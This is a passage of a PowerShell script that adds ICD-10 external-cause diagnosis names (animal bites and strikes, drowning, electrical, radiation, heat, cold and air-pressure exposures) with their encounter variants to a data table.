$null = $DiagnosisList.Rows.Add("Struck by other marine mammals","Struck by other marine mammals, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with other marine mammals","Other contact with other marine mammals, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with other marine mammals","Other contact with other marine mammals, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with other marine mammals","Other contact with other marine mammals, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by shark","Bitten by shark, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by shark","Bitten by shark, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by shark","Bitten by shark, sequela") + $null = $DiagnosisList.Rows.Add("Struck by shark","Struck by shark, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by shark","Struck by shark, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by shark","Struck by shark, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with shark","Other contact with shark, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with shark","Other contact with shark, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with shark","Other contact with shark, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by other fish","Bitten by other fish, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by other fish","Bitten by other fish, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by other fish","Bitten by other fish, sequela") + $null = $DiagnosisList.Rows.Add("Struck by other fish","Struck by other fish, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by other fish","Struck by other fish, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by other fish","Struck by other fish, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with other fish","Other contact with other fish, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with other fish","Other contact with other fish, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with other fish","Other contact with other fish, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by other nonvenomous marine animals","Bitten by other nonvenomous marine animals, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by other nonvenomous marine animals","Bitten by other nonvenomous marine animals, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by other nonvenomous marine animals","Bitten by other nonvenomous marine animals, sequela") + $null = $DiagnosisList.Rows.Add("Struck by other nonvenomous marine animals","Struck by other nonvenomous marine animals, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by other nonvenomous marine animals","Struck by other nonvenomous marine animals, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by other nonvenomous marine animals","Struck by other nonvenomous marine animals, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with other nonvenomous marine animals","Other contact with other nonvenomous marine animals, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with other nonvenomous marine animals","Other contact with other nonvenomous marine animals, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with other nonvenomous marine animals","Other contact with other nonvenomous marine animals, sequela") + $null = $DiagnosisList.Rows.Add("Bitten or stung by nonvenomous insect and other nonvenomous arthropods","Bitten or stung by nonvenomous insect and other nonvenomous arthropods, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten or stung by nonvenomous insect and other nonvenomous arthropods","Bitten or stung by nonvenomous insect and other nonvenomous arthropods, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten or stung by nonvenomous insect and other nonvenomous arthropods","Bitten or stung by nonvenomous insect and other nonvenomous arthropods, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by alligator","Bitten by alligator, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by alligator","Bitten by alligator, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by alligator","Bitten by alligator, sequela") + $null = $DiagnosisList.Rows.Add("Struck by alligator","Struck by alligator, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by alligator","Struck by alligator, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by alligator","Struck by alligator, sequela") + $null = $DiagnosisList.Rows.Add("Crushed by alligator","Crushed by alligator, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushed by alligator","Crushed by alligator, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushed by alligator","Crushed by alligator, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with alligator","Other contact with alligator, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with alligator","Other contact with alligator, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with alligator","Other contact with alligator, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by crocodile","Bitten by crocodile, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by crocodile","Bitten by crocodile, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by crocodile","Bitten by crocodile, sequela") + $null = $DiagnosisList.Rows.Add("Struck by crocodile","Struck by crocodile, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by crocodile","Struck by crocodile, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by crocodile","Struck by crocodile, sequela") + $null = $DiagnosisList.Rows.Add("Crushed by crocodile","Crushed by crocodile, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushed by crocodile","Crushed by crocodile, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushed by crocodile","Crushed by crocodile, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with crocodile","Other contact with crocodile, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with crocodile","Other contact with crocodile, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with crocodile","Other contact with crocodile, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by nonvenomous lizards","Bitten by nonvenomous lizards, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by nonvenomous lizards","Bitten by nonvenomous lizards, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by nonvenomous lizards","Bitten by nonvenomous lizards, sequela") + $null = $DiagnosisList.Rows.Add("Struck by nonvenomous lizards","Struck by nonvenomous lizards, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by nonvenomous lizards","Struck by nonvenomous lizards, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by nonvenomous lizards","Struck by nonvenomous lizards, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with nonvenomous lizards","Other contact with nonvenomous lizards, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with nonvenomous lizards","Other contact with nonvenomous lizards, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with nonvenomous lizards","Other contact with nonvenomous lizards, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by nonvenomous snake","Bitten by nonvenomous snake, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by nonvenomous snake","Bitten by nonvenomous snake, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by nonvenomous snake","Bitten by nonvenomous snake, sequela") + $null = $DiagnosisList.Rows.Add("Struck by nonvenomous snake","Struck by nonvenomous snake, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by nonvenomous snake","Struck by nonvenomous snake, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by nonvenomous snake","Struck by nonvenomous snake, sequela") + $null = $DiagnosisList.Rows.Add("Crushed by nonvenomous snake","Crushed by nonvenomous snake, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushed by nonvenomous snake","Crushed by nonvenomous snake, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushed by nonvenomous snake","Crushed by nonvenomous snake, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with nonvenomous snake","Other contact with nonvenomous snake, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with nonvenomous snake","Other contact with nonvenomous snake, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with nonvenomous snake","Other contact with nonvenomous snake, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by turtle","Bitten by turtle, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by turtle","Bitten by turtle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by turtle","Bitten by turtle, sequela") + $null = $DiagnosisList.Rows.Add("Struck by turtle","Struck by turtle, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by turtle","Struck by turtle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by turtle","Struck by turtle, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with turtle","Other contact with turtle, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with turtle","Other contact with turtle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with turtle","Other contact with turtle, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by other nonvenomous reptiles","Bitten by other nonvenomous reptiles, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by other nonvenomous reptiles","Bitten by other nonvenomous reptiles, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by other nonvenomous reptiles","Bitten by other nonvenomous reptiles, sequela") + $null = $DiagnosisList.Rows.Add("Struck by other nonvenomous reptiles","Struck by other nonvenomous reptiles, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by other nonvenomous reptiles","Struck by other nonvenomous reptiles, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by other nonvenomous reptiles","Struck by other nonvenomous reptiles, sequela") + $null = $DiagnosisList.Rows.Add("Crushed by other nonvenomous reptiles","Crushed by other nonvenomous reptiles, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushed by other nonvenomous reptiles","Crushed by other nonvenomous reptiles, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushed by other nonvenomous reptiles","Crushed by other nonvenomous reptiles, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with other nonvenomous reptiles","Other contact with other nonvenomous reptiles, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with other nonvenomous reptiles","Other contact with other nonvenomous reptiles, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with other nonvenomous reptiles","Other contact with other nonvenomous reptiles, sequela") + $null = $DiagnosisList.Rows.Add("Contact with nonvenomous plant thorns and spines and sharp leaves","Contact with nonvenomous plant thorns and spines and sharp leaves, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with nonvenomous plant thorns and spines and sharp leaves","Contact with nonvenomous plant thorns and spines and sharp leaves, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with nonvenomous plant thorns and spines and sharp leaves","Contact with nonvenomous plant thorns and spines and sharp leaves, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by parrot","Bitten by parrot, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by parrot","Bitten by parrot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by parrot","Bitten by parrot, sequela") + $null = $DiagnosisList.Rows.Add("Struck by parrot","Struck by parrot, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by parrot","Struck by parrot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by parrot","Struck by parrot, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with parrot","Other contact with parrot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with parrot","Other contact with parrot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with parrot","Other contact with parrot, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by macaw","Bitten by macaw, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by macaw","Bitten by macaw, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by macaw","Bitten by macaw, sequela") + $null = $DiagnosisList.Rows.Add("Struck by macaw","Struck by macaw, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by macaw","Struck by macaw, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by macaw","Struck by macaw, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with macaw","Other contact with macaw, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with macaw","Other contact with macaw, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with macaw","Other contact with macaw, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by other psittacines","Bitten by other psittacines, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by other psittacines","Bitten by other psittacines, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by other psittacines","Bitten by other psittacines, sequela") + $null = $DiagnosisList.Rows.Add("Struck by other psittacines","Struck by other psittacines, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by other psittacines","Struck by other psittacines, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by other psittacines","Struck by other psittacines, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with other psittacines","Other contact with other psittacines, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with other psittacines","Other contact with other psittacines, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with other psittacines","Other contact with other psittacines, sequela") + $null = $DiagnosisList.Rows.Add("Struck by chicken","Struck by chicken, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by chicken","Struck by chicken, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by chicken","Struck by chicken, sequela") + $null = $DiagnosisList.Rows.Add("Pecked by chicken","Pecked by chicken, initial encounter") + $null = $DiagnosisList.Rows.Add("Pecked by chicken","Pecked by chicken, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pecked by chicken","Pecked by chicken, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with chicken","Other contact with chicken, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with chicken","Other contact with chicken, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with chicken","Other contact with chicken, sequela") + $null = $DiagnosisList.Rows.Add("Struck by turkey","Struck by turkey, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by turkey","Struck by turkey, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by turkey","Struck by turkey, sequela") + $null = $DiagnosisList.Rows.Add("Pecked by turkey","Pecked by turkey, initial encounter") + $null = $DiagnosisList.Rows.Add("Pecked by turkey","Pecked by turkey, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pecked by turkey","Pecked by turkey, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with turkey","Other contact with turkey, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with turkey","Other contact with turkey, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with turkey","Other contact with turkey, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by goose","Bitten by goose, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by goose","Bitten by goose, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by goose","Bitten by goose, sequela") + $null = $DiagnosisList.Rows.Add("Struck by goose","Struck by goose, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by goose","Struck by goose, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by goose","Struck by goose, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with goose","Other contact with goose, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with goose","Other contact with goose, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with goose","Other contact with goose, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by duck","Bitten by duck, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by duck","Bitten by duck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by duck","Bitten by duck, sequela") + $null = $DiagnosisList.Rows.Add("Struck by duck","Struck by duck, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by duck","Struck by duck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by duck","Struck by duck, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with duck","Other contact with duck, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with duck","Other contact with duck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with duck","Other contact with duck, sequela") + $null = $DiagnosisList.Rows.Add("Bitten by other birds","Bitten by other birds, initial encounter") + $null = $DiagnosisList.Rows.Add("Bitten by other birds","Bitten by other birds, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bitten by other birds","Bitten by other birds, sequela") + $null = $DiagnosisList.Rows.Add("Struck by other birds","Struck by other birds, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by other birds","Struck by other birds, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by other birds","Struck by other birds, sequela") + $null = $DiagnosisList.Rows.Add("Other contact with other birds","Other contact with other birds, initial encounter") + $null = $DiagnosisList.Rows.Add("Other contact with other birds","Other contact with other birds, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other contact with other birds","Other contact with other birds, sequela") + $null = $DiagnosisList.Rows.Add("Contact with nonvenomous frogs","Contact with nonvenomous frogs, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with nonvenomous frogs","Contact with nonvenomous frogs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with nonvenomous frogs","Contact with nonvenomous frogs, sequela") + $null = $DiagnosisList.Rows.Add("Contact with nonvenomous toads","Contact with nonvenomous toads, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with nonvenomous toads","Contact with nonvenomous toads, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with nonvenomous toads","Contact with nonvenomous toads, sequela") + $null = $DiagnosisList.Rows.Add("Contact with other nonvenomous amphibians","Contact with other nonvenomous amphibians, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with other nonvenomous amphibians","Contact with other nonvenomous amphibians, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with other nonvenomous amphibians","Contact with other nonvenomous amphibians, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to other animate mechanical forces","Exposure to other animate mechanical forces, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other animate mechanical forces","Exposure to other animate mechanical forces, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other animate mechanical forces","Exposure to other animate mechanical forces, sequela") + $null = $DiagnosisList.Rows.Add("Accidental drowning and submersion while in bath-tub","Accidental drowning and submersion while in bath-tub, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental drowning and submersion while in bath-tub","Accidental drowning and submersion while in bath-tub, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental drowning and submersion while in bath-tub","Accidental drowning and submersion while in bath-tub, sequela") + $null = $DiagnosisList.Rows.Add("Accidental drowning and submersion while in swimming-pool","Accidental drowning and submersion while in swimming-pool, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental drowning and submersion while in swimming-pool","Accidental drowning and submersion while in swimming-pool, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental drowning and submersion while in swimming-pool","Accidental drowning and submersion while in swimming-pool, sequela") + $null = $DiagnosisList.Rows.Add("Accidental drowning and submersion while in natural water","Accidental drowning and submersion while in natural water, initial encounter") + $null = $DiagnosisList.Rows.Add("Accidental drowning and submersion while in natural water","Accidental drowning and submersion while in natural water, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Accidental drowning and submersion while in natural water","Accidental drowning and submersion while in natural water, sequela") + $null = $DiagnosisList.Rows.Add("Other specified cause of accidental non-transport drowning and submersion","Other specified cause of accidental non-transport drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified cause of accidental non-transport drowning and submersion","Other specified cause of accidental non-transport drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified cause of accidental non-transport drowning and submersion","Other specified cause of accidental non-transport drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified cause of accidental drowning and submersion","Unspecified cause of accidental drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified cause of accidental drowning and submersion","Unspecified cause of accidental drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified cause of accidental drowning and submersion","Unspecified cause of accidental drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to electric transmission lines","Exposure to electric transmission lines, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to electric transmission lines","Exposure to electric transmission lines, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to electric transmission lines","Exposure to electric transmission lines, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to domestic wiring and appliances","Exposure to domestic wiring and appliances, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to domestic wiring and appliances","Exposure to domestic wiring and appliances, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to domestic wiring and appliances","Exposure to domestic wiring and appliances, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to industrial wiring, appliances and electrical machinery","Exposure to industrial wiring, appliances and electrical machinery, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to industrial wiring, appliances and electrical machinery","Exposure to industrial wiring, appliances and electrical machinery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to industrial wiring, appliances and electrical machinery","Exposure to industrial wiring, appliances and electrical machinery, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to other electric current","Exposure to other electric current, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other electric current","Exposure to other electric current, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other electric current","Exposure to other electric current, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to X-rays","Exposure to X-rays, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to X-rays","Exposure to X-rays, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to X-rays","Exposure to X-rays, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to radioactive isotopes","Exposure to radioactive isotopes, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to radioactive isotopes","Exposure to radioactive isotopes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to radioactive isotopes","Exposure to radioactive isotopes, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to other ionizing radiation","Exposure to other ionizing radiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other ionizing radiation","Exposure to other ionizing radiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other ionizing radiation","Exposure to other ionizing radiation, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to welding light (arc)","Exposure to welding light (arc), initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to welding light (arc)","Exposure to welding light (arc), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to welding light (arc)","Exposure to welding light (arc), sequela") + $null = $DiagnosisList.Rows.Add("Exposure to tanning bed","Exposure to tanning bed, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to tanning bed","Exposure to tanning bed, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to tanning bed","Exposure to tanning bed, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to other man-made visible and ultraviolet light","Exposure to other man-made visible and ultraviolet light, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other man-made visible and ultraviolet light","Exposure to other man-made visible and ultraviolet light, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other man-made visible and ultraviolet light","Exposure to other man-made visible and ultraviolet light, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to unspecified man-made visible and ultraviolet light","Exposure to unspecified man-made visible and ultraviolet light, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to unspecified man-made visible and ultraviolet light","Exposure to unspecified man-made visible and ultraviolet light, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to unspecified man-made visible and ultraviolet light","Exposure to unspecified man-made visible and ultraviolet light, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to radiofrequency","Exposure to radiofrequency, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to radiofrequency","Exposure to radiofrequency, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to radiofrequency","Exposure to radiofrequency, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to infrared radiation","Exposure to infrared radiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to infrared radiation","Exposure to infrared radiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to infrared radiation","Exposure to infrared radiation, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to laser radiation","Exposure to laser radiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to laser radiation","Exposure to laser radiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to laser radiation","Exposure to laser radiation, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to other nonionizing radiation","Exposure to other nonionizing radiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other nonionizing radiation","Exposure to other nonionizing radiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other nonionizing radiation","Exposure to other nonionizing radiation, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to excessive heat of man-made origin","Exposure to excessive heat of man-made origin, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to excessive heat of man-made origin","Exposure to excessive heat of man-made origin, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to excessive heat of man-made origin","Exposure to excessive heat of man-made origin, sequela") + $null = $DiagnosisList.Rows.Add("Contact with dry ice","Contact with dry ice, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with dry ice","Contact with dry ice, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with dry ice","Contact with dry ice, sequela") + $null = $DiagnosisList.Rows.Add("Inhalation of dry ice","Inhalation of dry ice, initial encounter") + $null = $DiagnosisList.Rows.Add("Inhalation of dry ice","Inhalation of dry ice, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Inhalation of dry ice","Inhalation of dry ice, sequela") + $null = $DiagnosisList.Rows.Add("Contact with liquid air","Contact with liquid air, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with liquid air","Contact with liquid air, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with liquid air","Contact with liquid air, sequela") + $null = $DiagnosisList.Rows.Add("Inhalation of liquid air","Inhalation of liquid air, initial encounter") + $null = $DiagnosisList.Rows.Add("Inhalation of liquid air","Inhalation of liquid air, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Inhalation of liquid air","Inhalation of liquid air, sequela") + $null = $DiagnosisList.Rows.Add("Prolonged exposure in deep freeze unit or refrigerator","Prolonged exposure in deep freeze unit or refrigerator, initial encounter") + $null = $DiagnosisList.Rows.Add("Prolonged exposure in deep freeze unit or refrigerator","Prolonged exposure in deep freeze unit or refrigerator, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Prolonged exposure in deep freeze unit or refrigerator","Prolonged exposure in deep freeze unit or refrigerator, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to other excessive cold of man-made origin","Exposure to other excessive cold of man-made origin, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other excessive cold of man-made origin","Exposure to other excessive cold of man-made origin, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other excessive cold of man-made origin","Exposure to other excessive cold of man-made origin, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to prolonged high air pressure","Exposure to prolonged high air pressure, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to prolonged high air pressure","Exposure to prolonged high air pressure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to prolonged high air pressure","Exposure to prolonged high air pressure, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to residence or prolonged visit at high altitude","Exposure to residence or prolonged visit at high altitude, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to residence or prolonged visit at high altitude","Exposure to residence or prolonged visit at high altitude, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to residence or prolonged visit at high altitude","Exposure to residence or prolonged visit at high altitude, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to other prolonged low air pressure","Exposure to other prolonged low air pressure, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other prolonged low air pressure","Exposure to other prolonged low air pressure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other prolonged low air pressure","Exposure to other prolonged low air pressure, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to reduction in atmospheric pressure while surfacing from deep-water diving","Exposure to reduction in atmospheric pressure while surfacing from deep-water diving, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to reduction in atmospheric pressure while surfacing from deep-water diving","Exposure to reduction in atmospheric pressure while surfacing from deep-water diving, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to reduction in atmospheric pressure while surfacing from deep-water diving","Exposure to reduction in atmospheric pressure while surfacing from deep-water diving, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to reduction in atmospheric pressure while surfacing from underground","Exposure to reduction in atmospheric pressure while surfacing from underground, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to reduction in atmospheric pressure while surfacing from underground","Exposure to reduction in atmospheric pressure while surfacing from underground, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to reduction in atmospheric pressure while surfacing from underground","Exposure to reduction in atmospheric pressure while surfacing from underground, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to sudden change in air pressure in aircraft during ascent","Exposure to sudden change in air pressure in aircraft during ascent, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to sudden change in air pressure in aircraft during ascent","Exposure to sudden change in air pressure in aircraft during ascent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to sudden change in air pressure in aircraft during ascent","Exposure to sudden change in air pressure in aircraft during ascent, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to other rapid changes in air pressure during ascent","Exposure to other rapid changes in air pressure during ascent, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other rapid changes in air 